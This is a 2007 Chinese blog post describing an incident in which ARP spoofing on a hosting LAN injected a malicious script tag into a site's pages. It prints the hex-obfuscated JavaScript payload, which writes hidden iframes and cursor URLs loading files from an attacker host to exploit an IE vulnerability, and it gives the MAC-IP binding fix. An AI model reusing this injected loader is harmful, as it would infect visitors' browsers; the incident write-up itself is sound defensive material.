网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
让网页根据不同IE版本显示不同的内容
Feb 08 Javascript
JavaScript中__proto__与prototype的关系深入理解
Dec 04 Javascript
制作jquery遮罩层效果导航菜单代码分享
Dec 25 Javascript
jquery绑定事件不生效的解决方法
Feb 11 Javascript
利用jquery.qrcode在页面上生成二维码且支持中文
Feb 12 Javascript
JavaScript中setMonth()方法的使用详解
Jun 11 Javascript
jQuery树插件zTree使用方法详解
May 02 jQuery
Bootstrap实现下拉菜单多级联动
Nov 23 Javascript
使用vue2实现购物车和地址选配功能
Mar 29 Javascript
微信小程序项目实践之验证码倒计时功能
Jul 18 Javascript
npm配置国内镜像资源+淘宝镜像的方法
Sep 07 Javascript
jQuery操作选中select下拉框的值代码实例
Feb 07 jQuery
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
实现树状结构的两种方法
2006/10/09 PHP
PHP面向对象程序设计组合模式与装饰模式详解
2016/12/02 PHP
使用户点击后退按钮使效三行代码
2007/07/07 Javascript
Js 时间间隔计算的函数(间隔天数)
2011/11/15 Javascript
Three.js源码阅读笔记(物体是如何组织的)
2012/12/27 Javascript
Node.js中的事件驱动编程详解
2014/08/16 Javascript
JQuery中的html()、text()、val()区别示例介绍
2014/09/01 Javascript
jquery实现全选、反选、获得所有选中的checkbox
2020/09/13 Javascript
jquery使用on绑定a标签无效 只能用live解决
2016/06/02 Javascript
js中 计算两个日期间的工作日的简单实例
2016/08/08 Javascript
JS遍历ul下的li点击弹出li的索引的实现方法
2016/09/19 Javascript
bootstrap与Jquery UI 按钮样式冲突的解决办法
2016/09/23 Javascript
原生JS实现左右箭头选择日期实例代码
2017/03/14 Javascript
Ionic2调用本地SQlite实例
2017/04/22 Javascript
在vue中获取dom元素内容的方法
2017/07/10 Javascript
基于ES6 Array.of的用法(实例讲解)
2017/09/05 Javascript
angular 服务的单例模式(依赖注入模式下)详解
2018/10/22 Javascript
python根据距离和时长计算配速示例
2014/02/16 Python
Python3处理文件中每个词的方法
2015/05/22 Python
Python实现 多进程导入CSV数据到 MySQL
2017/02/26 Python
Python执行时间的计算方法小结
2017/03/17 Python
Python基于回溯法子集树模板实现图的遍历功能示例
2017/09/05 Python
Python之time模块的时间戳,时间字符串格式化与转换方法(13位时间戳)
2019/08/12 Python
在keras 中获取张量 tensor 的维度大小实例
2020/06/10 Python
python3获取控制台输入的数据的具体实例
2020/08/16 Python
学习Python需要哪些工具
2020/09/04 Python
python输入中文的实例方法
2020/09/14 Python
Mio Skincare法国官网:身体紧致及孕期身体护理
2018/04/04 全球购物
新郎父亲婚宴答谢词
2014/01/11 职场文书
上班看电影检讨书
2014/02/12 职场文书
《二泉映月》教学反思
2014/04/15 职场文书
邮政竞聘演讲稿
2014/09/03 职场文书
私人房屋买卖协议书
2014/10/04 职场文书
交通运输局四风问题对照检查材料思想汇报
2014/10/09 职场文书
简单的辞职信范文(2016最新版)
2015/05/12 职场文书
Vue+Element UI实现概要小弹窗的全过程
2021/05/30 Vue.js